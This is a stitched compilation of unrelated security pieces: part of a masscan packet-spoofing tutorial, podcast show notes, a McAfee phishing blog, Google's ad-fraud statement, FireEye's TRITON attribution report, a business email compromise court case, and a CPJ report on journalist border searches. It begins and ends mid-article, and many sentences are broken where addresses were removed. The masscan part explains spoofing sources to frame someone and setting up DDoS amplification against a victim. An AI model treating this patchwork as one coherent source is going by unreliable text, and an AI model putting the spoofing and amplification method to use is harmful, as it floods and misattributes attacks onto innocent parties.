Remember that on the local network, communication isn't between IP addresses but between Ethernet/WiFi addresses. IP addresses are for remote ends of the network, MAC addresses are how packets travel across the local network. It's like when you send your kid to grab the mail from the mailbox: the kid is Ethernet/WiFi, the address on the envelope is the IP address.

In this case, when masscan transmits packets to the local router, it needs to first use ARP to find the router's MAC address. Likewise, when the router receives a response from the Internet destined for masscan, it must first use ARP to discover the MAC address masscan is using.

As you can see in the picture at the top of this post, the MAC address of the notebook computer's WiFi interface is 14:63:a3:11:2d:d4. Therefore, when masscan see's an ARP request for, it must respond back with that MAC address.

These three steps should impress upon you that there's not actually a lot that any operating system does with the IP address assigned to it. We imagine there is a lot of complicated code involved. In truth, there isn't -- there's only a few simple things the operating system does with the address.

Moreover, this should impress upon you that the IP address is a property of the network not of the operating system. It's what the network uses to route packets to you, and the operating system has very little control over which addresses will work and which ones don't. The IP address isn't the name or identity of the operating system. It's like how your postal mailing address isn't you, isn't your identity, it's simply where you live, how people can reach you.

Another thing to notice is the difference between phone numbers and addresses. Your IP address depends upon your location. If you move your laptop computer to a different location, you need a different IP address that's meaningful for that location. In contrast, the phone has the same phone number wherever you travel in the world, even if you travel overseas. There have been decades of work in "mobile IP" to change this, but frankly, the Internet's design is better, though that's beyond the scope of this document.

That you can set any source address in masscan means you can play tricks on people. Spoof the source address of some friend you don't like, and they'll get all the responses. Moreover, angry people who don't like getting scanned may complain to their ISP and get them kicked off for "abuse".

To stop this sort of nonsense, a lot of ISPs do "egress filtering". Normally, a router only examines the destination address of a packet in order to figure out the direction to route it. With egress filtering, it also looks at the source address, and makes sure it can route responses back to it. If not, it'll drop the packet. I tested this by sending such spoofed addresses from to a server of mine on the Internet, and found that I did not receive them. (I used the famous tcpdump program to filter incoming traffic looking for those packets).
By the way, masscan also has to ARP the local router. in order to find it's MAC address before it can start sending packets to it. The first thing it does when it starts up is ARP the local router. It's the reason there's a short delay when starting the program. You can bypass this ARP by setting the router's MAC address manually.

First of all, you have to figure out what the local router's MAC address is. There are many ways of doing this, but the easiest is to run the arp command from the command-line, asking the operating system for this information. It, too, must ARP the router's MAC address, and it keeps this information in a table.
Then, I can run masscan using this MAC address:

    masscan --interface en0 --router-mac ac:86:74:78:28:b2 --source-ip ....

In the above examples, while masscan has it's own stack, it still requests information about the operating system's configuration, to find things like the local router. Instead of doing this, we can run masscan completely indepedently from the operating system, specifying everything on the command line.

To do this, we have to configure all the following properties of a packet:
  • the network interface of my MacBook computer that I'm using
  • the destination MAC address of the local router
  • the source hardware address my MacBook computer 
  • the destination IP address of the target I'm scanning
  • the source IP address where the target can respond to
  • the destination port number of the port I am scanning
  • the source port number of the connection
An example is shown below. When I generated these screenshots I'm located on a different network, so the local addresses have changed from the examples above. Here is a screenshot of running masscan:
And here is a screenshot from Wireshark, a packet sniffer, that captures the packets involved:
As you can see from Wireshark, the very first packet is sent without any preliminaries, based directly on the command-line parameters. There is no other configuration of the computer or network involved.

When the response packet comes back in packet #4, the local router has to figure out the MAC address of where to send it, so it sends an ARP in packet #2, to which masscan responds in packet #3, after which that incoming packet can successfully be forwarded in packet #4.

After this, the TCP connection proceeds as normal, with a three way handshake, an HTTP request, an HTTP response, and so forth, with a couple extra ACK packets (noted in red) that happen because masscan is actually a bit delayed in responding to things.

What I'm trying to show here is again that what happens on the network, the packets that are sent, and how things deal with them, is a straightforward function of the initial starting conditions.

One thing about this example is that I had to set the source MAC address the same as my laptop computer. That's because I'm using WiFi. There's actually a bit of invisible setup here where my laptop must connect to the access-point. The access-point only knows the MAC address of the laptop, so that's the MAC address masscan must use. Had this been Ethernet instead of WiFi, this invisible step wouldn't be necessary, and I would be able to spoof any MAC address. In theory, I could also add a full WiFi stack to masscan so that it could create it's own independent association with the WiFi access-point, but that'd be a lot of work.

Lastly, masscan supports a feature where you can specify a range of IP addresses. This is useful for a lot of reasons, such as stress-testing networks. An example:

    masscan --source-ip ....

For every probe, it'll choose a random IP address from that range. If you really don't like somebody, you can use masscan and flood them with source addresses in the range It's one of the many "stupid pet tricks" you can do with masscan that have no purpose, but which comes from a straightforward applications of the principles of manually configuring things.

Likewise, masscan can be used in DDoS amplification attacks. Like addresses, you can configure payloads. Thus, you can set the --source-ip to that of your victim, a list of destination addresses consisting of amplifiers, and a payload that triggers the amplification. The victim will then be flooded with responses. It's not something the program is specifically designed for, but usage that I can't prevent, as again, it's a straightforward application of the basic principles involved.


Learning about TCP/IP networking leads to confusion about the boundaries between what the operating-system does, and what the network does. Playing with masscan, which has it's own network stack, helps clarify this.

You can download masscan source code at:

Risky Business #519 — ’90s IRC war between US and Russia intensifies

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • CYBERCOM doxing Russian operators. No, really.
  • Arrest over Russian midterm info-op
  • Bloomberg dumpster fire is now a tyre fire
  • Equifax insider sentenced for insider trading
  • Twitter releases bot dataset
  • Saudi insider responsible for 2015 Twitter breach
  • Trisis/Triton now linked to Russia
  • Kaspersky doxes NSA op
  • Risky Business cited by Senate Estimates, AA Bill faces possible delay
  • Much, much more!

This week’s show is sponsored by Cylance, and this week’s sponsor interview is with Josh Lemos.

That’s an interesting chat – Cylance has succeeded in applying machine learning to classifying binaries, but what next? Where does it make sense to apply machine learning next, from their point of view? As you’ll hear, a binary classifier is one thing, but applying ML to something like endpoint detection and response or network traffic is actually a lot more complicated.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

U.S. Begins First Cyberoperation Against Russia Aimed at Protecting Elections - The New York Times
Russian woman charged with attempted meddling in upcoming U.S. midterms
Apple CEO Tim Cook Is Calling For Bloomberg To Retract Its Chinese Spy Chip Story
Amazon exec joins Apple in calling for a retraction of Bloomberg’s explosive microchip spying report | Business Insider
Coats: ODNI has seen 'no evidence' of supply chain hack detailed in Bloomberg story
Super Micro trashes Bloomberg chip hack story in recent customer letter | ZDNet
Equifax engineer who designed breach portal gets 8 months of house arrest for insider trading | ZDNet
Twitter publishes dump of accounts tied to Russian, Iranian influence campaigns | Ars Technica
A Twitter employee groomed by the Saudi government prompted 2015 state-sponsored hacking warning | TechCrunch
FireEye links Russian research lab to Triton ICS malware attacks | ZDNet
Kaspersky says it detected infections with DarkPulsar, alleged NSA malware | ZDNet
Patrick ☠️SMBv1☠️ Gray on Twitter: "Risky Biz gets a shout out in senate estimates... 2018 is weird.… "
Magecart group leverages zero-days in 20 Magento extensions | ZDNet
WordPress team working on "wiping older versions from existence on the internet" | ZDNet loses $7.5Mil worth of cryptocurrency in mysterious cold wallet hack | ZDNet
Hackers steal data of 75,000 users after FFE breach | ZDNet
Lawfare editor on persistent DDoS attack: 'We wish they'd knock it off'
Vendors confirm products affected by libssh bug as PoC code pops up on GitHub | ZDNet
Advertisers can track users across the Internet via TLS Session Resumption | ZDNet
Open source web hosting software compromised with DDoS malware | ZDNet
Legal and Constitutional Affairs Legislation Committee_2018_10_22_6688.pdf;fileType=application/pdf
I forgot to talk about this in the show... this week's sponsor guest recommends people interested in machine learning check out the papers and slide decks here:
CylanceOPTICS | Products | Cylance

New Wave of Browser Hijackers and How to Protect Your Environment

We recently received customer submissions related to a phishing campaign that was redirecting users to a browser hijacker. It became clear, after analysis, that these cases were related to a technical support scam in which the attacker uses scare tactics—such as displaying fake error messages and phone numbers—to trick the user into thinking they are infected with malware and paying for unnecessary technical support. This has special relevance for both consumer and corporate users since businesses rely heavily on emails. Phishing emails are one major contributor to security breaches.

As shown in the picture below, the user receives an email asking them to click on a box to display a message. When the user clicks the message, they are redirected to a URL prompting for user credentials.

The malicious URL is revealed by hovering over the message box, as shown in the screenshot below. These URLs tend to be available for a short time and are frequently changed in the phishing email.

The user may be redirected to a website like the one displayed below. Users may be tricked into providing their credentials.

This behavior resembles ransomware, since the user is unable to exit the browser as it enters full-screen mode. The user may also hear audio, which has also been observed with some ransomware variants. If you are unable to close the tab or the browser, open the task manager using Ctrl + Alt + Delete, locate the browser, and then terminate the process.

The screenshot below illustrates another example with some slight changes.

All domains involved in this campaign were purchased from Namecheap. The email accounts used to propagate this phishing attack are legitimate accounts that were compromised. Email hashes cannot be provided since they contain customer information.

How does McAfee protect users from technical support scam threats?

The malicious HTML embedded in the email has DAT coverage as “” and it is included in current DATs. Users can also use a combination of other McAfee products to protect their environment and their employees. Some of the products available are McAfee SiteAdvisor and McAfee Security for Microsoft Exchange.

McAfee SiteAdvisor

By using McAfee SiteAdvisor, the user collects the malicious URLs and adds them to the blocked sites list. This prevents other users from mistakenly providing their credentials if they receive the phishing email.

This can be achieved by accessing the Block and Allow List Policy in McAfee ePolicy Orchestrator (McAfee ePO) and adding the URL as illustrated below.

McAfee Endpoint Security 10.5 product guide:

McAfee Security for Microsoft Exchange

McAfee Security for Microsoft Exchange can be used to block the sender’s email address and prevent the phishing email from being sent to additional employees. This variant was taking advantage of a local user account to send the phishing emails. By using McAfee Security for Microsoft Exchange, users can blacklist their email addresses so they are not sent malicious emails.

McAfee Security for Microsoft Exchange 8.6.0 product guide:

What else can you do?

Any suspicious URLs can also be checked on the TrustedSource site. This will help determine if McAfee is aware of the URL and already providing coverage as illustrated below.

The URLs associated with this phishing attack have been classified as high risk in TrustedSource and McAfee SiteAdvisor.

How do I submit a malicious URL to McAfee?

Send an email to and they will gladly work with you.


For more information on phishing attacks, please visit the following links:

Knowledge Center article: How to recognize and protect yourself from phishing

Blog: How to Spot Phishing Lures

Blog: Don’t get hooked – phishing email advice for your employees

The post New Wave of Browser Hijackers and How to Protect Your Environment appeared first on McAfee Blogs.

Google tackles new ad fraud scheme

Fighting invalid traffic is essential for the long-term sustainability of the digital advertising ecosystem. We have an extensive internal system to filter out invalid traffic – from simple filters to large-scale machine learning models – and we collaborate with advertisers, agencies, publishers, ad tech companies, research institutions, law enforcement and other third party organizations to identify potential threats. We take all reports of questionable activity seriously, and when we find invalid traffic, we act quickly to remove it from our systems.

Last week, BuzzFeed News provided us with information that helped us identify new aspects of an ad fraud operation across apps and websites that were monetizing with numerous ad platforms, including Google. While our internal systems had previously caught and blocked violating websites from our ad network, in the past week we also removed apps involved in the ad fraud scheme so they can no longer monetize with Google. Further, we have blacklisted additional apps and websites that are outside of our ad network, to ensure that advertisers using Display & Video 360 (formerly known as DoubleClick Bid Manager) do not buy any of this traffic. We are continuing to monitor this operation and will continue to take action if we find any additional invalid traffic.

While our analysis of the operation is ongoing, we estimate that the dollar value of impacted Google advertiser spend across the apps and websites involved in the operation is under $10 million. The majority of impacted advertiser spend was from invalid traffic on inventory from non-Google, third-party ad networks.

A technical overview of the ad fraud operation is included below.

Collaboration throughout our industry is critical in helping us to better detect, prevent, and disable these threats across the ecosystem. We want to thank BuzzFeed for sharing information that allowed us to take further action. This effort highlights the importance of collaborating with others to counter bad actors. Ad fraud is an industry-wide issue that no company can tackle alone. We remain committed to fighting invalid traffic and ad fraud threats such as this one, both to protect our advertisers, publishers, and users, as well as to protect the integrity of the broader digital advertising ecosystem.
Technical Detail
Google deploys comprehensive, state-of-the-art systems and procedures to combat ad fraud. We have made and continue to make considerable investments to protect our ad systems against invalid traffic.

As detailed above, we’ve identified, analyzed and blocked invalid traffic associated with this operation, both by removing apps and blacklisting websites. Our engineering and operations teams, across various organizations, are also taking systemic action to disrupt this threat, including the takedown of command and control infrastructure that powers the associated botnet. In addition, we have shared relevant technical information with trusted partners across the ecosystem, so that they can also harden their defenses and minimize the impact of this threat throughout the industry.

The BuzzFeed News report covers several fraud tactics (both web and mobile app) that are allegedly utilized by the same group. The web-based traffic is generated by a botnet that Google and others have been tracking, known as “TechSnab.” The TechSnab botnet is a small to medium-sized botnet that has existed for a few years. The number of active infections associated with TechSnab was reduced significantly after the Google Chrome Cleanup tool began prompting users to uninstall the malware.

In similar fashion to other botnets, this operates by creating hidden browser windows that visit web pages to inflate ad revenue. The malware contains common IP based cloaking, data obfuscation, and anti-analysis defenses. This botnet drove traffic to a ring of websites created specifically for this operation, and monetized with Google and many third party ad exchanges. As mentioned above, we began taking action on these websites earlier this year.

Based on analysis of historical ads.txt crawl data, inventory from these websites was widely available throughout the advertising ecosystem, and as many as 150 exchanges, supply-side platforms (SSPs) or networks may have sold this inventory. The botnet operators had hundreds of accounts across 88 different exchanges (based on accounts listed with “DIRECT” status in their ads.txt files).

This fraud primarily impacted mobile apps. We investigated those apps that were monetizing via AdMob and removed those that were engaged in this behavior from our ad network. The traffic from these apps seems to be a blend of organic user traffic and artificially inflated ad traffic, including traffic based on hidden ads. Additionally, we found the presence of several ad networks, indicating that it's likely many were being used for monetization. We are actively tracking this operation, and continually updating and improving our enforcement tactics.

TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers


In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility. We now track this activity set as TEMP.Veles. In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute.

TRITON Intrusion Demonstrates Russian Links; Likely Backed by Russian Research Institute

FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The following factors supporting this assessment are further detailed in this post. We present as much public information as possible to support this assessment, but withheld sensitive information that further contributes to our high confidence assessment.

  1. FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
  2. Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
  3. An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
  4. Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
  5. We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.

While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer’s approval, the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute.


Malware Testing Activity Suggests Links between TEMP.Veles and CNIIHM

During our investigation of TEMP.Veles activity, we found multiple unique tools that the group deployed in the target environment. Some of these same tools, identified by hash, were evaluated in a malware testing environment by a single user.

Malware Testing Environment Tied to TEMP.Veles

We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools.

  • At times, the use of this malware testing environment correlates to in-network activities of TEMP.Veles, demonstrating direct operational support for intrusion activity.
    • Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment.
    • TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Soon after, the customized utility was again evaluated in the malware testing environment. The following day, TEMP.Veles again tried the utility on a compromised system.
  • The user has been active in the malware testing environment since at least 2013, testing customized versions of multiple open-source frameworks, including Metasploit, Cobalt Strike, PowerSploit, and other projects. The user’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques.
  • Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software, retrofitted with code used for command and control.

Testing, Malware Artifacts, and Malicious Activity Suggests Tie to CNIIHM

Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM.

  • A PDB path contained in a tested file contained a string that appears to be a unique handle or user name. This moniker is linked to a Russia-based person active in Russian information security communities since at least 2011.
    • The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine (хакер).
    • According to a now-defunct social media profile, the same individual was a professor at CNIIHM, which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow.
    • Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile.
  • Suspected TEMP.Veles incidents include malicious activity originating from, which is registered to CNIIHM.
    • This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities.
    • It also has engaged in network reconnaissance against targets of interest to TEMP.Veles.
    • The IP address has been tied to additional malicious activity in support of the TRITON intrusion.
  • Multiple files have Cyrillic names and artifacts.

Figure 1: Heatmap of TRITON attacker operating hours, represented in UTC time

Behavior Patterns Consistent with Moscow Time Zone

Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow, lending some further support to the scenario that CNIIHM, a Russian research organization in Moscow, has been involved in TEMP.Veles activity.

  • We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target’s network. These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone (Figure 1) supporting a proximity to Moscow.

Figure 2: Modified service config

  • Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus.
    • A ZIP archive recovered during our investigations,, contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service ‘ProgramDataUpdater.’
    • The malicious installation version has a task name and description in English, and the clean uninstall version has a task name and description in Cyrillic. The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order, heightening the possibility of a deliberate effort to mask its origins (Figure 2).

Figure 3: Central Research Institute of Chemistry and Mechanics (CNIIHM) (Google Maps)

CNIIHM Likely Possesses Necessary Institutional Knowledge and Personnel to Create TRITON and Support TEMP.Veles Operations

While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool. We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.

  • CNIIHM has at least two research divisions that are experienced in critical infrastructure, enterprise safety, and the development of weapons/military equipment:
    • The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts.
    • The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment. It also researches methods for enabling enterprise safety in emergency situations.
  • CNIIHM officially collaborates with other national technology and development organizations, including:
    • The Moscow Institute of Physics and Technology (PsyTech), which specializes in applied physics, computing science, chemistry, and biology.
    • The Association of State Scientific Centers “Nauka,” which coordinates 43 Scientific Centers of the Russian Federation (SSC RF). Some of its main areas of interest include nuclear physics, computer science and instrumentation, robotics and engineering, and electrical engineering, among others.
    • The Federal Service for Technical and Export Control (FTEC) which is responsible for export control, intellectual property, and protecting confidential information.
    • The Russian Academy of Missile and Artillery Sciences (PAPAH) which specializes in research and development for strengthening Russia’s defense industrial complex.
  • Information from a Russian recruitment website, linked to CNIIHM’s official domain, indicates that CNIIHM is also dedicated to the development of intelligent systems for computer-aided design and control, and the creation of new information technologies (Figure 4).

Figure 4: CNIIHM website homepage

Primary Alternative Explanation Unlikely

Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval. However, this scenario is highly unlikely.

  • In this scenario, one or more persons – likely including at least one CNIIHM employee, based on the moniker discussed above – would have had to conduct extensive, high-risk malware development and intrusion activity from CNIIHM’s address space without CNIIHM’s knowledge and approval over multiple years.
  • CNIIHM’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity. TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators.

Business Email Compromise: Putting a Wisconsin Case Under the Microscope

Clement Onuama and Orefo Okeke were arrested on November 1, 2017 in the Western District of Texas after receiving a complaint and warrant from the District of Wisconsin, that the pair were involved in Romance Scams and Business Email Compromise Scams.

This week Okeke was sentenced to 45 months in prison.  Onuama was sentenced on October 30th to 40 months in prison.
Orefo Okeke (image from Dallas News
Clement Onuama, 53

According to the Criminal Complaint and Indictments from the case, from 2010 until at least December 2016, in the Western District of Wisconsin and elsewhere Clement Onuama and Orefo Okeke knowingly conspired with each other and persons known and unknown to the grand jury, to commit and cause to be committed offenses against the United States, namely: wire fraud, in violation of Title 18, United States Code, Section 1343.

They used Romance fraud scams, developing relations via email, chat apps, and telephonic conversations.  Eventually the person that posed as the victim's online partner requested each victim for financial assistance. They told the victims that they needed funds in order to release a much larger sum of money that was frozen by a foreign country.

They also used Business email compromise scams, primarily by sending email messages that altered wire instructions causing funds to be deposited into accounts controlled by the criminals.  Often these emails were "spoofed" to appear to come from an employee or officer of their company.  During several such scams, the real officer was traveling.

 The deposited funds went into bank accounts of "nominees and shell entities" and were quickly converted to cash and cashier's checks, with a portion of the funds wired overseas.  The criminals also failed to pay taxes on their proceeds.

 $3,259,892 in transfers were attempted and the actual fraud losses were $2,678,328.  The proceeds laundered by Onuama totalled $428,346.  The proceeds laundered by Okeke totalled $538,100.

 Details of the Wisconsin BEC Fraud Scam 

  On or about February 19, 2014 at 10:02 am, an email puporting to be from Sarah Smith from the email  was sent in reply to real estate agent Terrell Outlay of Madison, Wisconsin asking him to update wire instructions that were sent a few days before.  The email had an attachment from Portage County Title, on Portage County Title letterhead, updating the details and indicating funds should be sent to a Wells Fargo Bank account in Bettendor, Iowa in the name of TJ Hausch.

 $123,747.54 was wired later that day.

 On the same day, a wire transfer from Tammy Hausch's Wells Fargo bank account ending in 9492 sent $80,000 to a Wells Fargo bank account ending in 6411 held by Clement C. Onuama of Grand Prairie, Texas.  Clement withdrew $10,000 in cash that day, $20,000 in cash the following day, and purchased a cashier's check for $28,885 from the account.  On March 11, 2014, a check for $10,000 was sent from Okeke to Onuama, who cashed it.

 An Affidavit from a Treasury Agent shares more details.  Terrell Outlay was a new real estate agent who had recently relocated from Chicago.  Outlay is believed to have had malware planted on his computer in relation to a home sale that he negotiated in January 2014.

 After receiving the email from, instructing the agent to have his client, Dynasty Holdings, wire $123,747.54 to the TJ Hasuch Wells Fargo account. He was contacted by the REAL Sarah Smith on February 25, 2014 to inform him the funds were never received into the BMO Harris Account which had been agreed to at closing.  Outlay reported the situation to his boss, who contacted the Madison Police Department.

 Although the email of February 19, 2014 seemed to be from, the headers revealed it was sent from and the actual email was

 A second email, confirming to Mr. Outlay that the new account should be used:  "Yes!! TJ Hausch Wells Fargo" -- used the email server located at with IP address and the same outlook account, ""

 Four additional pieces of email correspondence used the same "" IP and return address.  Legitimate emails from Sarah Smith were sent from a Charter Communications IP address, confirmed by subpoena to belong to Portage County Title in Stevens Point, Wisconsin.

 The IP belongs to Sharktech in Chicago, Illinois, and that particular IP address was leased from August 13, 2013 to March 24, 2014 by a Singapore-based company called Surat IT Pte. Ltd. It was used to host hundreds of websites.  The other IP address,, was confirmed to be a Unified Layer IP address operated by Bluehost.  The customer of record at that time was Hind Jouini of Dubai, UAE.

 The additional funds from the Tammy Hausch account were sent to a Bank of America account ending in 9593 held by P.M. Voss of Costa Mesa, California.

 Tammy Hausch was interviewed by the US Secret Service in Madison, Wisconsin.  She was unaware of the source of the $123,000.  She had actually performed four similar transactions in the past, all at the bequest of her online boyfriend, Brian Ward, with whom she had communicated exclusively online.  Brian needed her help because he and his friends had funds that were locked up in Spain and he needed additional funds to pay to have those funds released.

 Hausch had previously received a $12,112 check from the IRS addressed to Brian and Patricia Downing.  "Brian Ward" said that Patricia Downing was the maiden name of his deceased wife.

 Brian Downing was interviewed and reported that when he attempted to file his 2013 taxes, he learned they had already been filed and that an unauthorized tax refund of $12,112 had already been paid to a Wells Fargo account ending in 9492.  He confirmed his wife Patricia was not deceased and introduced her to the agent.

  More BEC Fraud Linked to the Case 

  On August 23, 2016, Anessa Hazelle, the financial controller of Ocean Grove Development of Basseterre, Saint Kitts, West Indies told the Treasury investigator that on November 30, 2015, an email claiming to be from her supervisor, Nuri Katz, urged her to wire $84,100 to D&D Serv, Inc of Grand Prairie, Texas, to pay an invoice for the purchase of "VxWorks Proll" for $84,100.  Hazelle did as she was ordered, and sent the funds.  Katz was on a flight to Russia at that time.  After she landed, they had a telephone conversation and learned that this email had been fraudulent.

 Katz true email was "" but the email with the wire transfer instructions was from "" - similar enough that Hazelle did not notice the difference.  The funds were sent to a Capital One Bank account ending in 8232.

 That Capital One acount was opened by Clement C. Onuama d/b/a D&D Serv, Inc, of 2621 Skyway Drive, Grand Prairie, Texas.  Onuama was the sole signatory of the account.

 On July 26, 2016, Daniel Yet, the owner of D&T Foods of Santa Clara, California, relayed a similar experience.  His personal investment account at TD Ameritrade was managed by Bao Vu.  On June 29, 2015, while Yet was traveling overseas on vacation, Vu attempted to contact him to verify a wire transfer request sending $22,000 to a Regions Bank account ending in 6870 for Sysco Serve.  Since Vu could not reach Yet, and the matter had been described as urgent, Vu went ahead with the wire.  A SECOND request came through asking for an additional $30,000 to be sent.

 The Regions Bank account ending in 6870 was opened by Orefo S. Okeke d/b/a Sysco Serve, with the same address as the Capital One account controlled by Onuama above, 2621 Skyway Drive, Grand Prairie, Texas!

 The 6870 Regions account made a payment of $15,000 on July 1, 2015 (two days after the deposit from Mr. Yet's TD Ameritrade account) to another Regions Bank account ending in 6452.

 The 6452 Regions account was opened by Clement C. Onuama d/b/a D&D Serv, of 2621 Skyway Drive, Grand Prairie, Texas.

  Letters from Okeke

  The defense entered seven letters to be considered during the sentencing hearing.  In the first, Orefo explains that when he first came to America, he made a business of buying used American cars and reselling them in Nigeria.  He ended up in financial hardship, which he blames partly on medical bills for his sick father and partly on caring for his wife and two step children.  He was approached by others in Nigeria who needed his assistance in converting US dollars to Nigerian Niara.

 The other letters explained how Orefo was kind enough to hire a convicted felon to work for him, and a disabled veteran.  One letter, from his Aunty, says he is kind and loves animals. His wife begs the mercy of the courts and explains how much her children miss him.  Okeke's brother in South Africa explains to the judge that his brother is an honest God-fearing man and that his pleading guilty demonstrates his honesty, and that this trial caused the death of their father and now their mother's health is also on the line. His uncle writes how sad it is that the judge has incarcerated his nephew for a non-violent first time offense causing him to miss his sister's wedding and his father's funeral.  A friend explains Okeke's very good moral character and how he always operates with integrity.

 On the other hand, the FBI says that Business Email Compromise has stolen $12 Billion dollars, and that just from June 2016 to May 2018 they have identified 30,787 victims, of which 19,335 of them were in the United States.  Records from October 2013 to May 2013 actually show at least 119,675 victims!  Hopefully the examples shared above will help us realize more about how these people come to be victims -- often losing their entire life savings, or funds that cause them to no longer be able to buy a house or continue the operation of a business!

The best enterprise level firewalls: Rating 10 top products

You know you need to protect your company from unauthorized or unwanted access. You need a network-security tool that examines the flow of packets in and out of the enterprise, governed by rules that decide whether that flow is safe, malicious or questionable and in need of inspection. You need a firewall.

Recognizing that you need a firewall is the first – and most obvious -- step. The next crucial step in the decision-making process is determining which firewall features and policies best-suit your company’s needs.

Today’s enterprise firewalls must be able to secure an increasingly complex network that includes traditional on-premises data center deployments, remote offices and a range of cloud environments. Then you have to implement and test the firewall once it's installed. Perhaps the only element more complex than configuring, testing and managing a next-generation firewall is the decision-making process regarding which product to trust with your enterprise security.

To read this article in full, please click here

(Insider Story)

Important new report sheds light on the US government’s border stops of journalists

Reuters/Patrick T. Fallon

Sometimes, journalists’ stories take them across borders. But when journalists are targeted for interrogation about their work or are pressured into to handing over their devices, they must go to extra lengths to protect their sources and reporting. A new report by the Committee to Protect Journalists (CPJ) sheds light on officials’ unacceptable targeting of reporters at the border.

CPJ identified 37 journalists who found secondary screenings by Customs and Border Patrol (CBP) to be invasive. Out of that group, 30 said they were questioned about their reporting, and 20 of them said their electronic devices were searched by border officers without a warrant. Between 2006 and June 2018, the 37 journalists were collectively stopped for screenings more than 110 times.

In several instances, United States border agents have demanded passwords to unlock journalists’ devices, which often contain sensitive information about stories and sources, as condition for entry into the United States. Some journalists, like photojournalist David Devgen, have opted to surrender their passwords rather than have their devices confiscated. Journalist Ali Lafti unlocked his phone for CBP, believing he did not have a choice, and cultural reporter Anne Elizabeth Moore complied when asked to leave her phone on and unlocked on the dashboard of her car by border agents.

Others, like Canadian journalist Ed Ou, refuse to provide the passwords to their devices, and are denied entry into the country altogether. That journalists are forced to choose between their privacy and protecting the integrity of their reporting and their ability to report out a story is outrageous, and not a real choice at all.

In many of the cases included in CPJ’s report, journalists did not feel that they fully understood their rights, and whether they could refuse to surrender their devices or passwords. Ed Ou said that he was not prepared for what happened in the United States, which he had thought protected press freedom and freedom of expression.

CBP has broad authority to conduct searches at the border, including without a warrant.

“Courts have so far upheld the so-called “border exception” to the Fourth Amendment’s requirement that authorities obtain a warrant to search people and their belongings,” CPJ’s report reads. “But legal challenges are being mounted over whether physical objects—such as laptops and phones—and the digital information contained on these devices should be treated the same way.”

Senators have proposed two bills that would move to reign in CBP’s sweeping powers relating to device searches of U.S. citizens and permanent residents. The Protecting Data at the Border Act would require CBP to obtain a warrant for searches of Americans’ devices, and the Leahy-Daines Bill would prohibit border officers from conducting searches without first meeting a standard of reasonable suspicion.

Legislation that would protect the rights of American journalists at the border is critical, and these bills should be adopted (preferably the stronger Protecting Data at the Border Act). But oftentimes, it’s non-American journalists that are the most vulnerable at the border, who may have less legal support, and are perhaps less likely to know their rights in the United States. No journalist, American or not, should face threats to their reporting at the border, and the civil liberties and privacy of journalists who are not citizens or permanent residents are no less important.

The 37 cases explored by CPJ is a small set of the millions of people and likely thousands of journalists who leave and enter the United States every year. So while it’s impossible to make any sort of conclusion about trends, in general, border stops have increased under the Trump administration.

U.S. Customs and Border Patrol reported in April
last year that searches increased from 8,500 in fiscal year 2015 to about 19,000 in fiscal year 2016, with another 15,000 conducted in just the first half of 2017. CPJ’s report has shed light on CBP’s dangerous treatment of journalists going about doing their jobs in the context of CBP’s increasingly disturbing privacy violations.

Secondary screenings that target journalists traveling for work are deeply concerning and threaten to undermine press freedom. As federal agencies ramp up warrantless searches of devices at the border, the protection of journalists’ digital lives and the work of civil liberties groups has never been more important.

Some notes for journalists about cybersecurity

The recent Bloomberg article about Chinese hacking motherboards is a great opportunity to talk about problems with journalism.

